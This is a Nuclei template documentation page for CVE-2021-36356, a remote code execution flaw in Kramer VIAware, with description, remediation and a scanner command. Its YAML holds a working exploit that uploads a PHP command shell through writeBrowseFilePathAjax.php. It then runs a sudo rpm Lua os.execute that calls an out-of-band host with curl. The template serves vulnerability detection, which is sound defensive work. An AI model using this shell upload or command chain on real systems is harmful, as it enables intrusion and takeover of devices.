Skip to content
Nuclei Templates

Kramer VIAware - Remote Code Execution

ID: CVE-2021-36356

Severity: critical

Author: gy741

Tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav

Description

Section titled “Description”

KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames.

YAML Source

Section titled “YAML Source”
id: CVE-2021-36356


info:
  name: Kramer VIAware - Remote Code Execution
  author: gy741
  severity: critical
  description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames.
  remediation: |
    Apply the latest firmware update provided by Kramer to fix the vulnerability and ensure proper input validation in the web interface.
  reference:
    - https://www.exploit-db.com/exploits/50856
    - https://nvd.nist.gov/vuln/detail/CVE-2021-36356
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35064
    - https://write-up.github.io/kramerav/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-36356
    cwe-id: CWE-434
    epss-score: 0.88569
    epss-percentile: 0.98691
    cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: kramerav
    product: viaware
  tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav
variables:
  useragent: "{{rand_base(6)}}"


http:
  - raw:
      - |
        POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php
      - |
        GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'")}' HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - http


      - type: word
        part: interactsh_request
        words:
          - "User-Agent: {{useragent}}"
# digest: 4a0a00473045022100ab24d4517659cfc71cc9174bedd7f06a98d19a88518a943c6370da62ce2ef5b6022046964e6b7878197eb6156a2cb11b6856c59f0ceabd08bd409631d6bb5d95afce:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-36356.yaml"

View on Github